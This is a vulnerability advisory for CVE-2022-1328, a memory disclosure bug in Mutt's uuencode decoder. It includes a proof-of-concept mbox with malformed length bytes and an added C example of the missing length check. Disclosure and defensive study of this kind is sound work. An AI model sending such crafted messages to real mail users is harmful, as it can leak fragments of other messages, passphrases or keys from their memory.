Mutt mutt_decode_uuencoded() Memory Disclosure

2022.07.12
Credit: Tavis Ormandy
Risk: High
Local: No
Remote: Yes
CWE: CWE-120


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

mutt: mutt_decode_uuencoded() can read past the end of the input line

In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replies, for example fragments of other messages, passphrases or keys.

Reproduce with the following mbox, note that these are literal 0x9f bytes. This should show some uninitialized garbage in the message.

    From taviso Thu Mar 31 16:53:55 2022
    From: taviso
    Subject: mutt_decode_uuencoded test
    Content-Disposition: inline
    Content-Transfer-Encoding: x-uuencode
    Content-Type: text/plain

    begin 644 test
    <9f>
    M2&5L;&\L"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU
    M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*"@H*
    <9f>
    54&QE87-E(')E<&QY+`I4879I<RX*
    `
    end

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is YYYY-MM-DD.

Related CVE Numbers: CVE-2022-1328.

Found by: taviso@google.com
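The missing length validation described in this report, as an added example that is not Mutt's code or its patch: a strict uuencode line decoder that rejects a declared length the line cannot supply. The function names are hypothetical, the decoder assumes full 4-character groups, and the valid sample line is the last data line of the reproducer.

```c
#include <stdio.h>
#include <string.h>

/* Map one uuencoded character to its 6-bit value ('`' and ' ' both give 0). */
static unsigned uu_val(char ch)
{
    return ((unsigned char)ch - 32u) & 0x3fu;
}

/* Byte count announced by a line's first character; attacker-controlled. */
size_t uu_declared_len(const char *line)
{
    return line[0] ? uu_val(line[0]) : 0;
}

/* Decode one NUL-terminated uuencoded line (newline already stripped).
 * Returns bytes written to out, or -1 when the declared length needs more
 * encoded characters than the line holds or more room than outcap. */
int uu_decode_line(const char *line, unsigned char *out, size_t outcap)
{
    size_t want = uu_declared_len(line);
    size_t need = (want + 2) / 3 * 4;      /* every 3 bytes take 4 characters */
    const char *p = line + 1;
    size_t n = 0;
    if (want == 0) return 0;               /* empty or terminator line */
    /* The validation step: without it the loop reads past the NUL. */
    if (want > outcap || strlen(p) < need)
        return -1;
    while (n < want) {
        unsigned a = uu_val(p[0]), b = uu_val(p[1]);
        unsigned c = uu_val(p[2]), d = uu_val(p[3]);
        unsigned char tri[3];
        tri[0] = (unsigned char)(a << 2 | b >> 4);
        tri[1] = (unsigned char)((b & 15) << 4 | c >> 2);
        tri[2] = (unsigned char)((c & 3) << 6 | d);
        for (int i = 0; i < 3 && n < want; i++)
            out[n++] = tri[i];
        p += 4;
    }
    return (int)n;
}

int main(void)
{
    unsigned char buf[64];
    printf("%d\n", uu_decode_line("54&QE87-E(')E<&QY+`I4879I<RX*", buf, sizeof buf));
    printf("%d\n", uu_decode_line("\x9f", buf, sizeof buf));
    return 0;
}
```

A line holding only the 0x9f byte declares 63 bytes of payload while carrying none, which is the mismatch the check catches.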

